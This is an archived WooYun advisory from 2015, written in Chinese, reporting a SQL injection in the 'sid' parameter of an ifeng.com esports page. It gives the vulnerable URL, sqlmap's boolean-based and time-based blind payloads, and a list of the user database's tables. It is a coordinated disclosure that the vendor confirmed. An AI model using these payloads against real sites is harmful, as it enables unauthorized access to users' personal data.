当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095544

漏洞标题:凤凰网某站存在SQL注入之2(大量用户信息泄露)

相关厂商:凤凰网

漏洞作者: 路人甲

提交时间:2015-02-04 09:42

修复时间:2015-03-21 09:44

公开时间:2015-03-21 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-04: 厂商已经确认,细节仅向厂商公开
2015-02-14: 细节向核心白帽子及相关领域专家公开
2015-02-24: 细节向普通白帽子公开
2015-03-06: 细节向实习白帽子公开
2015-03-21: 细节向公众公开

简要描述:

凤凰网某站存在SQL注入#2(大量用户信息泄露)

详细说明:

注入点

http://esports.games.ifeng.com/sta/setuserin/?sid=dzshd1&user=


经检测参数sid存在注入

sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=dzshd1' AND 8747=8747 AND 'gksS'='gksS&user=
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: sid=dzshd1' AND SLEEP(5) AND 'Jpnj'='Jpnj&user=
---
[23:48:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11

漏洞证明:

可获取数据库“esports_ifeng_93”

QQ截图20150203234935.png


发现该数据库中有100多张表,应该是记录用户数据,目测很多。。。o(∩_∩)o 

| contest_main            |
| contest_type            |
| game_list               |
| game_type               |
| hslist                  |
| ifeng_games_zhuanti     |
| signup_userlist_1       |
| signup_userlist_10      |
| signup_userlist_11      |
| signup_userlist_12      |
| signup_userlist_13      |
| signup_userlist_14      |
| signup_userlist_15      |
| signup_userlist_16      |
| signup_userlist_17      |
| signup_userlist_18      |
| signup_userlist_19      |
| signup_userlist_2       |
| signup_userlist_20      |
| signup_userlist_21      |
| signup_userlist_22      |
| signup_userlist_23      |
| signup_userlist_24      |
| signup_userlist_25      |
| signup_userlist_26      |
| signup_userlist_27      |
| signup_userlist_28      |
| signup_userlist_29      |
| signup_userlist_3       |
| signup_userlist_30      |
| signup_userlist_31      |
| signup_userlist_32      |
| signup_userlist_33      |
| signup_userlist_34      |
| signup_userlist_35      |
| signup_userlist_36      |
| signup_userlist_37      |
| signup_userlist_38      |
| signup_userlist_39      |
| signup_userlist_4       |
| signup_userlist_40      |
| signup_userlist_41      |
| signup_userlist_42      |
| signup_userlist_43      |
| signup_userlist_44      |
| signup_userlist_45      |
| signup_userlist_46      |
| signup_userlist_47      |
| signup_userlist_48      |
| signup_userlist_49      |
| signup_userlist_5       |
| signup_userlist_50      |
| signup_userlist_51      |
| signup_userlist_52      |
| signup_userlist_53      |
| signup_userlist_54      |
| signup_userlist_55      |
| signup_userlist_56      |
| signup_userlist_57      |
| signup_userlist_58      |
| signup_userlist_59      |
| signup_userlist_6       |
| signup_userlist_60      |
| signup_userlist_61      |
| signup_userlist_62      |
| signup_userlist_63      |
| signup_userlist_64      |
| signup_userlist_65      |
| signup_userlist_66      |
| signup_userlist_67      |
| signup_userlist_68      |
| signup_userlist_69      |
| signup_userlist_7       |
| signup_userlist_70      |
| signup_userlist_71      |
| signup_userlist_72      |
| signup_userlist_73      |
| signup_userlist_74      |
| signup_userlist_75      |
| signup_userlist_76      |
| signup_userlist_77      |
| signup_userlist_78      |
| signup_userlist_79      |
| signup_userlist_8       |
| signup_userlist_9       |
| signup_userlist_tmplate |
| userinfo_list           |
| userlist                |
| warlist_1               |
| warlist_10              |
| warlist_11              |
| warlist_12              |
| warlist_13              |
| warlist_14              |
| warlist_15              |
| warlist_16              |
| warlist_17              |
| warlist_18              |
| warlist_19              |
| warlist_2               |
| warlist_20              |
| warlist_21              |
| warlist_22              |
| warlist_23              |
| warlist_24              |
| warlist_25              |
| warlist_26              |
| warlist_27              |
| warlist_28              |
| warlist_29              |
| warlist_3               |
| warlist_30              |
| warlist_31              |
| warlist_32              |
| warlist_33              |
| warlist_34              |
| warlist_35              |
| warlist_36              |
| warlist_37              |
| warlist_38              |
| warlist_39              |
| warlist_4               |
| warlist_40              |
| warlist_41              |
| warlist_42              |
| warlist_43              |
| warlist_44              |
| warlist_45              |
| warlist_46              |
| warlist_47              |
| warlist_48              |
| warlist_49              |
| warlist_5               |
| warlist_50              |
| warlist_51              |
| warlist_52              |
| warlist_53              |
| warlist_54              |
| warlist_55              |
| warlist_56              |
| warlist_57              |
| warlist_58              |
| warlist_59              |
| warlist_6               |
| warlist_60              |
| warlist_61              |
| warlist_62              |
| warlist_63              |
| warlist_65              |
| warlist_66              |
| warlist_67              |
| warlist_68              |
| warlist_69              |
| warlist_7               |
| warlist_70              |
| warlist_71              |
| warlist_72              |
| warlist_73              |
| warlist_74              |
| warlist_77              |
| warlist_78              |
| warlist_79              |
| warlist_8               |
| warlist_9               |
| warlist_tmplate         |


猜解其中的signup_userlist_1表,只读取其中一条数据。。其他表及其数据并未涉及

QQ截图20150204004619.png


望及时修复,这次会有20Rank么。。

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-04 10:25

厂商回复:

非常感谢您对凤凰网信息安全的帮助。

最新状态:

暂无